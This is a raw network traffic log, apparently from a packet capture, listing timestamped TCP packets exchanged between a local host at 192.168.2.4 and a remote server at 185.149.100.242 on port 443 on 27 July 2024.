Jul 27, 2024 07:44:02.375910044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.377744913 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.377779961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.377800941 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.377805948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.377834082 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.377846956 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.546188116 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.546205997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.546367884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.546392918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.546438932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.548573971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.548588037 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.548630953 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.548640966 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.548660040 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.548683882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.550801039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.550816059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.550865889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.550873041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.550911903 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.554425955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.554441929 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.554486036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.554491997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.554518938 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.554537058 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.687354088 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.687414885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.687553883 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.687575102 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.687624931 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.688960075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.689009905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.689045906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.689052105 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.689071894 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.689106941 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.689491034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.689543962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.689579010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.689584970 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.689616919 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.689616919 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.691648006 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.691693068 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.691744089 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.691749096 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.691781044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.691781044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.692059994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.692110062 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.692131042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.692137003 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.692161083 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.692176104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.692857027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.692902088 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.692926884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.692933083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.692949057 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.692967892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.839179993 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.839205980 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.839334011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.839467049 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.839468002 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.839492083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.839709997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.839725971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.840065956 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.840085983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.840511084 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.840586901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.841660976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.841676950 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.841829062 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.968843937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.968904972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.968930960 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.968949080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.968960047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.968990088 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.969415903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.969459057 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.969494104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.969501019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.969535112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.969556093 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.971026897 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.971080065 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.971101046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.971107960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.971129894 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.971152067 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.971468925 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.971523046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.971529007 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.971551895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.971579075 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.971587896 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972187042 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.972232103 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.972254038 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972260952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.972270966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972290993 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972309113 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972754955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.972800016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.972825050 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972831011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.972842932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.972876072 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.973479033 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.973525047 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.973546028 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.973551989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.973576069 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.973588943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.110173941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.110217094 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.110335112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.110378027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.110380888 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.110378981 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.110400915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.110409975 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.110611916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.111525059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.111565113 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.111613989 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.111637115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.111653090 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.111910105 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.111957073 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.111978054 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.111984968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.112018108 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.112849951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.112885952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.112916946 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.112924099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.112936020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.113428116 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.113475084 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.113491058 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.113497972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.113537073 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.113856077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.113895893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.113918066 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.113924026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.113950014 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.114288092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.114335060 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.114348888 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.114362001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.114387989 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.162242889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.250919104 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.250936031 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.251117945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.251117945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.251142025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.251359940 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.251405001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.251419067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.251586914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.251586914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.251607895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.251647949 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.252981901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253000021 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253043890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253051043 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253063917 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253083944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253416061 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253431082 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253470898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253477097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253501892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253520012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253882885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253897905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253938913 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253945112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.253964901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.253977060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.254411936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.254427910 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.254462957 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.254467964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.254484892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.254503012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.254965067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.254992962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.255032063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.255037069 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.255060911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.255075932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.255249023 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.255268097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.255295038 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.255300999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.255320072 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.255337954 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.392532110 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.392564058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.392726898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.392754078 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.392949104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.393131018 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.393176079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.393210888 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.393220901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.393237114 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.393268108 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.393882036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.393928051 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.393955946 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.393960953 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.393985987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394005060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394161940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.394203901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.394234896 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394239902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.394269943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394294024 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394716978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.394762993 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.394793987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394800901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.394824982 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.394839048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395140886 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395184994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395214081 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395220041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395258904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395313025 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395576954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395616055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395654917 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395661116 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395688057 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395699024 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.395889044 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.395967960 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.396475077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.396547079 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.535486937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.535550117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.535686970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.535686970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.535697937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.535731077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.535921097 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.535953045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.535998106 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536027908 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536041975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536130905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536186934 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536214113 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536220074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536247969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536264896 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536319017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536340952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536372900 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536380053 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536397934 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536417961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536539078 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536564112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536604881 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536609888 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536637068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536653042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536840916 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536868095 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536907911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536912918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.536937952 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.536959887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.537198067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.537219048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.537250042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.537255049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.537285089 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.537298918 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.537595987 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.537616014 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.537662029 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.537667990 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.537692070 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.537713051 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674192905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674249887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674365997 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674365997 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674390078 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674421072 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674609900 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674609900 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674638987 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674690008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674710989 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674734116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.674933910 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674983025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.674998045 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.675005913 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.675035000 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.675040007 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.675687075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.675729036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.675746918 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.675755024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.675781012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.675786018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.676177979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.676224947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.676240921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.676249027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.676275969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.676281929 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.676541090 CEST	443	62252	185.149.100.242	192.168.2.4
